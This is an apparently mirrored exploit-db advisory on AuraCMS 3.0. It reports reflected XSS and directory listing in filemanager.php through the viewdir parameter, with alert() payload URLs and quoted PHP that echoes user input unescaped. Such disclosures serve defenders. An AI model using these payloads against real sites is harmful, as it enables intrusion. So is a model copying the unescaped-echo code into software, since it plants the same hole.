AuraCMS 3.0 – Multiple Vulnerabilities

  • 作者: Mustafa ALTINKAYNAK
    日期: 2014-05-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33555/
  • # Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities
    # Date: 05/28/2014
    # Author: Mustafa ALTINKAYNAK
    # Download URL :http://auracms.org/
    # Software Link: http://codeload.github.com/auracms/AuraCMS/zip/master
    # Vuln Category: CWE-79 (XSS) - CWE-98 (LFI)
    # Tested on: AuraCMS 3.0
    # Tested Local Platform : XAMP on Windows 8
    # Patch/ Fix: Not published.
    ---------------------------
     
    Technical Details
    ---------------------------
    1) Reflected XSS : FileManager is a parameter unfiltered view of the file.
    Ex: filemanager.php?viewdir="><script>alert('Mustafa');</script>
    
    2) LFI (Local File Include) : Directory listing is done.
    Ex : filemanager.php?viewdir=/home
    
    ---------------------------------------------------------------------------------
    # filemanager.php (Between 263,311 line)
    Example : domain.com/auracms/filemanager.php?viewdir=request
    280 line : <input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" />
    
    Example 2 : domain.com/auracms/filemanager.php?viewdir="><script>alert("mustafa");</script>
    <input type="hidden" value="<script>alert("mustafa");</script>" name="return" />
    
    Example 3 : domain.com/auracms/filemanager.php?viewdir=<script>alert("mustafa");</script>
    <input type="hidden" value=" "><script>alert("mustafa");</script>" name="return" /> Bingooo :)
    
    <?php
    if(isset($_GET['viewdir'])) {
    ?>
    		<ul id="browser-toolbar">
    			<li class="file-new"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['new_file_title']; ?>" onclick="toggle_visibility('load-file'); return false;"><?php echo $lng['new_file']; ?></a></li>
    			<li class="folder-new"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['new_folder_title']; ?>" onclick="create_folder('<?php echo $_GET['viewdir']; ?>'); return false;"><?php echo $lng['new_folder']; ?></a></li>
     			<li class="folder-delete"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['delete_folder_title']; ?>" onclick="delete_folder('<?php echo $_GET['viewdir']; ?>');"><?php echo $lng['delete_folder']; ?></a></li>
    			<li class="file-refresh"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['refresh_files_title']; ?>" onclick="load('filemanager.php?viewdir=<?php echo $_GET['viewdir']; ?>','view-files'); return false;"><?php echo $lng['refresh']; ?></a></li>
    		</ul>
    		
    		<div id="current-loction">
    		<?php echo htmlspecialchars($root_path . '/' . $_GET['viewdir'] . '/'); ?>
    		</div>
    		
    		<form style="display: none;" id="load-file" action="" class="load-file" method="post" enctype="multipart/form-data">
    
    			<fieldset>
    			<legend><?php echo $lng['new_file_title']; ?></legend>
    				<input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" />
    				<label><?php echo $lng['form_file']; ?><input type="file" name="new_file" /></label>
    			</fieldset>
    			
    			<fieldset>
    			<legend><?php echo $lng['new_file_manipulations']; ?></legend>
    			<table>
    					<tr>
    						<td><label for="new_resize"><?php echo $lng['form_width']; ?></label></td>
    						<td><input type="text" class="number" maxlength="4" id="new_resize" name="new_resize" value="" /> px</td>
    					</tr>
    					<tr>
    						<td><label for="new_rotate"><?php echo $lng['form_rotate']; ?></label></td>
    						<td>
    							<select id="new_rotate" name="new_rotate">
    							<option value="0"></option>
    							<option value="90">90</option>
    							<option value="180">180</option>
    							<option value="270">270</option>
    							</select>
    						</td>
    					</tr>
    					<tr>
    						<td></td>
    						<td><input type="checkbox" class="checkbox" id="new_greyscale" name="new_greyscale" /><label for="new_greyscale"><?php echo $lng['form_greyscale']; ?></label></td>
    					</tr>
    			</table>
    			</fieldset>
    			
    			<input type="submit" id="insert" value="<?php echo $lng['form_submit']; ?>" />
    			
    		</form>
    <?php } ?>
    -----------
    
    Mustafa ALTINKAYNAK
    twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak>
    www.mustafaaltinkaynak.com